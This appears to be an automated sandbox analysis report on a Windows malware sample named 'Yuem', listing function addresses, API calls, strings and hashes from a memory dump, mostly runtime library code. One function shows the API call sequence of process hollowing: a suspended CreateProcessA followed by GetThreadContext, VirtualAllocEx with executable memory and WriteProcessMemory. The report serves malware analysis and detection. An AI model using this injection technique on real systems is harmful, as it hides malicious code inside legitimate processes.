Opcode ID: 0d826a3e2390d10de591072ec156e0595435e3240bbbaafd977c9dceaac82960
Instruction ID: b2522f8d584939a752925ec003ce5634395dcf91e11edf17c1e416ffafa46550
Opcode Fuzzy Hash: 0d826a3e2390d10de591072ec156e0595435e3240bbbaafd977c9dceaac82960
Instruction Fuzzy Hash: E0D1E3719002589BEF25EB28CC497EDBB71AF45300F5042D8E449A72D2EB755FC8DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CED7E0 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db114d449607d12f02fdcfa39ef68f2f93f429dce8f579c7bd9ff6a9564549b3
Instruction ID: 22a7ab89423af487a9b9f7a1c478bd190eae3c2cf6d5e608512292253bf8324b
Opcode Fuzzy Hash: db114d449607d12f02fdcfa39ef68f2f93f429dce8f579c7bd9ff6a9564549b3
Instruction Fuzzy Hash: 68317A71A1024CAFEB04DFA8CD85BEEBBB6EB49304F504219F815A7381DB7599808B91

Uniqueness

Uniqueness Score: -1.00%

Function 00D1C033 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 00D1C06D

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 7a98cf0974d7d0757d1ff46057bfa32f70edc446c72b84df65dda4a1aa5aa24d
Instruction ID: 2375c29c43b4a44cfdf34420f7a459611ca480e0730b041977ed37e8b6577654
Opcode Fuzzy Hash: 7a98cf0974d7d0757d1ff46057bfa32f70edc446c72b84df65dda4a1aa5aa24d
Instruction Fuzzy Hash: 5C111875A0420AAFCB05DF58E9419DB7BF4EF48304F15405AF805EB351DA70D951CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00D22E0E Relevance: 1.5, APIs: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00D22E71

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction ID: 345e7696bfdd1d0e36e5dbf4bf7401f98b3094d3399c14515e3cae017b7b4c27
Opcode Fuzzy Hash: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction Fuzzy Hash: 7A012C72C0015DBFCF01AFA8AC019FE7FB5EF18314F144165B914A21A1E6318A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D22B55 Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00D22F45,?,?,00000000,?,00D22F45,00000000,0000000C), ref: 00D22B72

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: bf9f8e03d9de8e99d39f877f2fb0385b453f5fc731c5c4f652c71109886ff9d7
Instruction ID: f65ab12a23e7157d24d2b539a96578a0adec5e0b13938ff7e79a4b1e7a4d6140
Opcode Fuzzy Hash: bf9f8e03d9de8e99d39f877f2fb0385b453f5fc731c5c4f652c71109886ff9d7
Instruction Fuzzy Hash: 62D06C3200420DBBDF028F84DC06EDA3BAAFB48714F014000BA1896120C772E921AB94

Uniqueness

Uniqueness Score: -1.00%

Function 00CE8B50 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(?,00CEE90D,?,?,?,?), ref: 00CE8B59

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 6959dbf1fd355b68559b4f4bdb55c4fa0785b36064a5a44cae7a9c2c99d90ffa
Instruction ID: a92925538a3647365c1d6b78043a5c9f0218c08e9def831ed01a646870fceded
Opcode Fuzzy Hash: 6959dbf1fd355b68559b4f4bdb55c4fa0785b36064a5a44cae7a9c2c99d90ffa
Instruction Fuzzy Hash: D3C01270000B405BDE1C4B3959880663322A9433557E40B88D0399B1E2CB36C90FE714

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00CFDBB8 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CFDBBE
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00CFDBCC
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00CFDBDD
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00CFDBEE
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00CFDBFF
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00CFDC10
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00CFDC21
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00CFDC32
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00CFDC43
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00CFDC54
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00CFDC65
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00CFDC76
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00CFDC87
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00CFDC98
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00CFDCA9
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00CFDCBA
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00CFDCCB
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00CFDCDC
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00CFDCED
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00CFDCFE
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00CFDD0F
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00CFDD20
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00CFDD31
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00CFDD42
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00CFDD53
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00CFDD64
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00CFDD75
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00CFDD86
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CFDD97
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CFDDA8
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00CFDDB9
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CFDDCA
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00CFDDDB
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CFDDEC
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00CFDDFD
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00CFDE0E
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00CFDE1F
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00CFDE30
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00CFDE41
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00CFDE52
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00CFDE63

Strings

CloseThreadpoolWait, xrefs: 00CFDCC0
TryAcquireSRWLockExclusive, xrefs: 00CFDDD0
InitializeSRWLock, xrefs: 00CFDDAE
CreateSymbolicLinkW, xrefs: 00CFDD09
CreateSemaphoreW, xrefs: 00CFDC38
FreeLibraryWhenCallbackReturns, xrefs: 00CFDCE2
FlsGetValue, xrefs: 00CFDBE3
CreateEventExW, xrefs: 00CFDC27
WakeConditionVariable, xrefs: 00CFDD7B
CloseThreadpoolWork, xrefs: 00CFDE25
LCMapStringEx, xrefs: 00CFDE58
SetThreadpoolTimer, xrefs: 00CFDC6B
GetCurrentPackageId, xrefs: 00CFDD15
ReleaseSRWLockExclusive, xrefs: 00CFDDE1
GetLocaleInfoEx, xrefs: 00CFDE47
SetThreadpoolWait, xrefs: 00CFDCAF
FlushProcessWriteBuffers, xrefs: 00CFDCD1
CompareStringEx, xrefs: 00CFDE36
FlsAlloc, xrefs: 00CFDBC6
SleepConditionVariableSRW, xrefs: 00CFDDF2
CreateThreadpoolTimer, xrefs: 00CFDC5A
SleepConditionVariableCS, xrefs: 00CFDD9D
FlsSetValue, xrefs: 00CFDBF4
GetCurrentProcessorNumber, xrefs: 00CFDCF3
WaitForThreadpoolTimerCallbacks, xrefs: 00CFDC7C
WakeAllConditionVariable, xrefs: 00CFDD8C
SubmitThreadpoolWork, xrefs: 00CFDE14
InitializeConditionVariable, xrefs: 00CFDD6A
CloseThreadpoolTimer, xrefs: 00CFDC8D
GetTickCount64, xrefs: 00CFDD26
SetFileInformationByHandle, xrefs: 00CFDD48
CreateThreadpoolWait, xrefs: 00CFDC9E
AcquireSRWLockExclusive, xrefs: 00CFDDBF
GetSystemTimePreciseAsFileTime, xrefs: 00CFDD59
FlsFree, xrefs: 00CFDBD2
InitOnceExecuteOnce, xrefs: 00CFDC16
kernel32.dll, xrefs: 00CFDBB9
InitializeCriticalSectionEx, xrefs: 00CFDC05
CreateSemaphoreExW, xrefs: 00CFDC49
GetFileInformationByHandleEx, xrefs: 00CFDD37
CreateThreadpoolWork, xrefs: 00CFDE03

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 8f435ec50f7fb0ee6f87f5cb9c7a41916f5280faed3677cf9189c59dc588a6aa
Instruction ID: 7714faa4a73a8453ac6a378a7ca8dc101c105f8595e98f1337f87dfb3ab5e6cd
Opcode Fuzzy Hash: 8f435ec50f7fb0ee6f87f5cb9c7a41916f5280faed3677cf9189c59dc588a6aa
Instruction Fuzzy Hash: A2616575D56350FFC744AFF4AE0E89A3BA8AB1A7427108416B501D2361DFB8424DEFB4

Uniqueness

Uniqueness Score: -1.00%

Function 00CE74F0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00CE751D
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00CE757B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00CE7594
GetThreadContext.KERNEL32(?,00000000), ref: 00CE75A9
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00CE75C9
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00CE760B
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00CE7628
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CE76E1

Strings

, xrefs: 00CE75C0
invalid stoi argument, xrefs: 00CE74E0
VUUU, xrefs: 00CE7391

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 1acde36aec640918eb4bd9c42facf8173c1c2d2b049197797c6f483226931e02
Instruction ID: bd6d2710713394fab67c65a01c737a4708f187577efbfac30be78904a7a09afa
Opcode Fuzzy Hash: 1acde36aec640918eb4bd9c42facf8173c1c2d2b049197797c6f483226931e02
Instruction Fuzzy Hash: D1416D70648741BFE7209F25DD06F6A7BE9FF48B04F000519B785DA2E0E7B0A914CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00D02263 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00D02366
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00D023B2

Part of subcall function 00D03AAD: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00D03BA0

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00D0241E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00D0243A
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00D0248E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00D024BB
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00D02511

Strings

(, xrefs: 00D02372

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 345a339d57eecde4eff0bab16f2492f0b2c44bff2edde2d4a3909c505f073fa0
Instruction ID: a9265efae481c1089eeb5a0f0b1a6869cc254715f4235c1f95931417be77c767
Opcode Fuzzy Hash: 345a339d57eecde4eff0bab16f2492f0b2c44bff2edde2d4a3909c505f073fa0
Instruction Fuzzy Hash: 36B17970A01611AFCB18CF68D995B7EB7B4FB48300F14816EE849AB791D770E980DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D02A52 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D0414C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00D0415F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00D02A64

Part of subcall function 00D0425F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00D04289
Part of subcall function 00D0425F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00D042F8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00D02B96
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00D02BF6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00D02C02
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00D02C3D
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00D02C5E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00D02C6A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00D02C73
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00D02C8B

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: cc62d34ab58698f93c02f473f3831b3a47b2adba13f8eb7077d55fcf8ad74ca1
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: 49816B71A01625AFCB18CFA8C588A7DB7F1FF48304B1546ADD449A7745C770AD42CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00D10098 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00D100D1

Part of subcall function 00D0A37F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00D0A3A0

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00D10137
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 00D1014F
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 00D1015C

Part of subcall function 00D0FBFF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00D0FC27
Part of subcall function 00D0FBFF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00D0FCBF
Part of subcall function 00D0FBFF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00D0FCC9
Part of subcall function 00D0FBFF: Concurrency::location::_Assign.LIBCMT ref: 00D0FCFD
Part of subcall function 00D0FBFF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00D0FD05

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 61fbc77f746c7a04a4cd0f0191e7aed6002520a14151b92a2fcdadab8a04946f
Instruction ID: deac6b0542905dbbbfb8eccdc3990f789293e5d80a51ab231b1412c1dc491c63
Opcode Fuzzy Hash: 61fbc77f746c7a04a4cd0f0191e7aed6002520a14151b92a2fcdadab8a04946f
Instruction Fuzzy Hash: 63519231A00305EBCF15EF50D855BEEBB71EF44300F184068E946AB392CA74AE85CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D23B1A Relevance: 3.1, APIs: 2, Instructions: 91timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D23B2A

Part of subcall function 00D1C1D5: HeapFree.KERNEL32(00000000,00000000,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?), ref: 00D1C1EB
Part of subcall function 00D1C1D5: GetLastError.KERNEL32(?,?,00D204AD,?,00000000,?,?,?,00D204D4,?,00000007,?,?,00D208D6,?,?), ref: 00D1C1FD

GetTimeZoneInformation.KERNEL32 ref: 00D23B3C

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 3107070095-0
Opcode ID: 4b41577822a3eedf9ee7ad6b1893488c872baec4fe42dcf66c17e68544f71fa1
Instruction ID: 253311fb644639d9509d980f5102a3edb1bb6af915bc4268fb90fd70da67a050
Opcode Fuzzy Hash: 4b41577822a3eedf9ee7ad6b1893488c872baec4fe42dcf66c17e68544f71fa1
Instruction Fuzzy Hash: 7131C1B1904351EFCB119F69EC9587ABBB8FF26328718056AE050D73A1D7749E40DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00CFF1F6 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CFF20C

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
